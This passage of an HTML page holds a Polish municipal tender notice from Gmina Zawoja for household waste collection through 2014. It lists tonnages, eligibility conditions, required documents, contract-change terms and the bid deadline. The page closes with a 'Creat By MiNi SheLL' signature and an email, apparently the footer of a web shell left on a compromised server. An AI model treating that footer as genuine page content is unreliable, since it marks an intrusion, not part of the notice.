g)Wykonawca zobowiązany będzie do przekazywania Zamawiającemu kart przekazania odpadów do RIPOKów bądź innej jednostki do odbioru odpadów selektywnie zebranych zgodnie z obowiązującymi wzorami, o jakich mowa w rozporządzeniu Ministra Środowiska z 8 grudnia 2010 r. w sprawie wzorów stosowanych na potrzeby ewidencji i odpadów, rozporządzeniu Ministra Środowiska z dnia 8 grudnia 2010 r. w sprawie zakresu informacji oraz wzorów formularzy służących do sporządzania i przekazywania zbiorczych zestawień danych o odpadach oraz kart wagowych z ważenia odpadów z miejsca bazy magazynowo-transportowej oraz miejsc przekazania do dalszego postępowania z nimi.
Szczegółowe dane charakteryzujące wielkość zamówienia
Liczba budynków (gospodarstw domowych) - ok. 3,2 tys. Zamieszkałych.
Ilość odpadów odebrana od mieszkańców  w II półroczu roku 2013 wyniosła 435,19 Mg    w tym:
Zmieszane - 224,04 Mg
Wielkogabaryty - 69,52 Mg
Posegregowane - 141,63 Mg
Ilość budynków w których prowadzona jest segregacja - 90%
Ilość budynków w których nieprowadzona jest segregacja - 10%
Z uwagi na wprowadzenie selektywnej zbiórki zwiększonej ilości rodzajów odpadów, szacuje się, że stopień segregacji wyniesie 80 %.  W związku    z tym odpady segregowane dla okresu półrocznego stanowić będą ok. 348 Mg, natomiast niesegregowane (zmieszane) ok. 87 Mg. Przewidywana ilość     i rodzaj odpadów są wartościami szacunkowymi, obowiązkiem Wykonawcy jest odbiór każdej ilości odpadów od właścicieli nieruchomości objętych przetargiem. 
W cenie oferty, Wykonawca uwzględnia również odpowiednią ilość worków, które Wykonawca będzie zobowiązany dostarczyć właścicielom nieruchomości przez punkty dystrybucji w każdej miejscowości..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.20.00-9, 90.51.13.00-5, 90.51.31.00-7, 90.51.40.00-3, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żada zabezpieczenia oferty wadium w wysokości: 5.000,00 zł słownie: /pięć tysięcy złotych 00/100/.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeśli wykonawca wykaże że posiada uprawnienia do wykonywania określonej działalności lub czynności.
Zamawiający żąda:
a)	zezwolenia na prowadzenie działalności w zakresie transportu i zbierania odpadów, wydane przez właściwy organ zgodnie z ustawą o odpadach ( z zastrzeżeniem art. 31 ust. 1, art. 32 ust.1,oraz art. 33 ust.1a i 4 ustawy o odpadach);
b)	oświadczenia o wpisie do rejestru podmiotów zbierających zużyty sprzęt elektryczny i elektroniczny, prowadzonego przez Głównego Inspektora Ochrony Środowiska;
c)	oświadczenie o wpisie do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu Gminy Zawoja.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną  usługę, odpowiadające swoim rodzajem przedmiotowi niniejszego zamówienia i o wartości co najmniej 200 000, 00 zł. 
Wykazana usługa musi być poparta dokumentami potwierdzającymi, że usługa ta została wykonana należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienia wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający wymaga oświadczenia wykonawcy, iż posiada bazę magazynowo-transportową oraz o odpowiednim stanie technicznym  wyposażenie umożliwiające odbieranie odpadów komunalnych od właścicieli nieruchomości - zgodnie z ROZPORZĄDZENIEM MINISTRA ŚRODOWISKA z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z dnia 25 stycznia 2013 r. nr 0 poz. 122 ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienia wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający wymaga oświadczenia wykonawcy w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeśli wykonawca wykaże że, posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności, zgodnej z przedmiotem niniejszego zamówienia, co najmniej na kwotę 300 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zamawiający żąda j/w:
a)zezwolenia na prowadzenie działalności w zakresie transportu i zbierania odpadów, wydane przez właściwy organ zgodnie z ustawą o odpadach ( z zastrzeżeniem art. 31 ust. 1, art. 32 ust.1,oraz art. 33 ust.1a i 4 ustawy o odpadach);
b)oświadczenia o wpisie do rejestru podmiotów zbierających zużyty sprzęt elektryczny i elektroniczny, prowadzonego przez Głównego Inspektora Ochrony Środowiska;
c)oświadczenie o wpisie do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z terenu Gminy Zawoja.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa może zostać zmieniona w przypadku:
1.	zmiany obowiązującej stawki VAT wynikającej z przepisu prawa.
2.	zaistnienia, po zawarciu umowy, przypadku siły wyższej, przez którą, na potrzeby niniejszego warunku, rozumieć należy zdarzenie zewnętrzne wobec łączącej Strony więzi prawnej: - o charakterze niezależnym od Stron, - którego Strony nie mogły przewidzieć przed zawarciem umowy, - którego nie można uniknąć ani któremu Strony nie mogły zapobiec przy zachowaniu należytej staranności, - której nie można przypisać drugiej Stronie. Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia;
3.	 zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia Stron; 
4.	powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony; 
5.	zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi lub warunkami organizacyjnymi albo okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy- zmianie mogą ulec termin realizacji Umowy oraz terminy wynikające z harmonogramu 
6.	gdy zaistnieje inna, niemożliwa do przewodzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze Stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania Umowy, zgodnie ze specyfikacją istotnych warunków zamówienia - Zamawiający dopuszcza możliwość zmiany Umowy, w szczególności terminu realizacji zamówienia.
Warunki dokonywania zmian:  
1.	zmiana może być inicjowana na wniosek Zamawiającego lub Wykonawcy, przy czym strona wnioskująca zobowiązana jest do szczegółowego uzasadnienia proponowanych zmian, 
2.	zmiana musi uzyskać aprobatę obu stron, 
3.	zmiana musi być zgodna z SIWZ oraz ustawą, w tym w szczególności: 
a)	zmiana umowy nie może naruszać zasady zachowania uczciwej konkurencji oraz równego traktowania Wykonawców, 
b)	zmiana musi być wprowadzona w formie pisemnej pod rygorem nieważności, 
c)	zmiana nie może spowodować wykroczenia usługi poza przedmiot zamówienia opisany w SIWZ</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zawoja.ug.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Zawoja
23-222 Zawoja 1307.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.07.2014 godzina 09:00, miejsce: Urząd Gminy Zawoja
23-222 Zawoja 1307
Biuro Obsługi Klienta UG Zawoja.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com